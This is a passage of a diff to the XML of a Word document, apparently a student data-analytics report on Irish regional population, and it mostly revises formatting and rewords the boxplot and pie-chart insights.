-        <w:t xml:space="preserve"> - EDA </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>–</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Visualization</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>”</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
       </w:pPr>
       <w:proofErr w:type="spellStart"/>
@@ -5842,6 +6211,7 @@
           <w:bCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
         <w:t>BoxPlot</w:t>
       </w:r>
@@ -5849,8 +6219,11 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
         <w:t>:</w:t>
       </w:r>
@@ -6083,7 +6456,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId7">
+                    <a:blip r:embed="rId9">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -6130,9 +6503,8 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Figure 01: </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
+        <w:t xml:space="preserve">Figure 01: Boxplot  </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -6141,33 +6513,37 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Boxplot  </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>-</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> population by region</w:t>
+        <w:t>- population by region</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>Insights:</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
+        <w:ind w:firstLine="720"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:b w:val="0"/>
@@ -6178,30 +6554,11 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-        </w:rPr>
-        <w:t>Insights:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:ind w:firstLine="720"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:b w:val="0"/>
           <w:kern w:val="0"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:b w:val="0"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>From this boxplot we can get some Insights:</w:t>
       </w:r>
     </w:p>
@@ -6226,6 +6583,7 @@
           <w:tab w:val="left" w:pos="14656"/>
         </w:tabs>
         <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
@@ -6283,6 +6641,7 @@
       <w:pPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
         <w:ind w:firstLine="720"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
@@ -6304,6 +6663,7 @@
       <w:pPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
         <w:ind w:firstLine="720"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="24"/>
@@ -6342,6 +6702,7 @@
           <w:tab w:val="left" w:pos="14656"/>
         </w:tabs>
         <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:i/>
@@ -6683,7 +7044,6 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Comparisons: We can compare two or more variables over time. This can be useful for identifying differences between regions.</w:t>
       </w:r>
     </w:p>
@@ -6729,7 +7089,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId8">
+                    <a:blip r:embed="rId10">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -6788,6 +7148,7 @@
           <w:bCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -6797,6 +7158,7 @@
           <w:bCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
         <w:t>Insights:</w:t>
       </w:r>
@@ -6822,16 +7184,11 @@
         <w:ind w:firstLine="720"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Also, we can observe some anomalies in the regions "Border" and "South-East", which show a decrease in </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>population.</w:t>
+        <w:t>Also, we can observe some anomalies in the regions "Border" and "South-East", which show a decrease in population.</w:t>
       </w:r>
       <w:r>
         <w:t>.</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6839,15 +7196,7 @@
         <w:ind w:firstLine="720"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Considering the trend line, and </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>further more</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> using Machine Learning, we can get </w:t>
+        <w:t xml:space="preserve">Considering the trend line, and further more using Machine Learning, we can get </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">insights into the future of population. </w:t>
@@ -6856,14 +7205,6 @@
     <w:p>
       <w:pPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
@@ -6871,6 +7212,29 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
         <w:t>Pie Chart:</w:t>
       </w:r>
     </w:p>
@@ -6891,6 +7255,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:tab/>
         <w:t>From Pie charts we can get following insights:</w:t>
       </w:r>
@@ -6973,13 +7338,97 @@
     <w:p>
       <w:pPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-      </w:pPr>
+        <w:ind w:firstLine="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Pie chart </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>uses</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a 1D array as input. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>so,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> we need to convert the data variable to a 1D array</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> u</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">sing </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>numpy.ravel</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>() function we can flattens a NumPy array into a 1D array.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6999,103 +7448,6 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:t xml:space="preserve">Pie chart </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>uses</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a 1D array as input. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>so,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> we need to convert the data variable to a 1D array</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> u</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">sing </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>numpy.ravel</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>() function we can flattens a NumPy array into a 1D array.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:ind w:firstLine="720"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
         <w:t>In this case, we will plot two Pie Carts one with data from 2013 and other with data from 2023</w:t>
       </w:r>
       <w:r>
@@ -7145,7 +7497,6 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5946AAFE" wp14:editId="4E8CC8EC">
             <wp:extent cx="5153343" cy="2183140"/>
@@ -7164,7 +7515,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId9">
+                    <a:blip r:embed="rId11">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -7234,20 +7585,10 @@
           <w:bCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Insights:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-      </w:pPr>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>Insight</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -7256,6 +7597,27 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
+        <w:t>s:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:tab/>
       </w:r>
       <w:r>
@@ -7265,27 +7627,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:t xml:space="preserve">From the pie chart, we can observe that the biggest region in population Is the Dublin </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>region</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> and the smallest is </w:t>
+        <w:t xml:space="preserve">From the pie chart, we can observe that the biggest region in population Is the Dublin region and the smallest is </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7440,50 +7782,78 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:t xml:space="preserve">the population of Ireland is becoming more concentrated in the Dublin region. This may be due to </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>a number of</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> factors, such as job opportunities, educational opportunities, and cultural amenities.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Roboto Bold" w:hAnsi="Roboto Bold" w:cs="Roboto Bold"/>
-          <w:b w:val="0"/>
+        <w:t>the population of Ireland is becoming more concentrated in the Dublin region. This may be due to a number of factors, such as job opportunities, educational opportunities, and cultural amenities.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:ind w:firstLine="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:ind w:firstLine="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
           <w:bCs/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc59959349"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>1.3 Requirements</w:t>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="3" w:name="_Toc59959350"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">2.0 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>Statistics for Data Analytics</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:bookmarkEnd w:id="3"/>
     </w:p>
@@ -7493,16 +7863,1409 @@
         <w:spacing w:line="288" w:lineRule="auto"/>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:rStyle w:val="NoneA"/>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
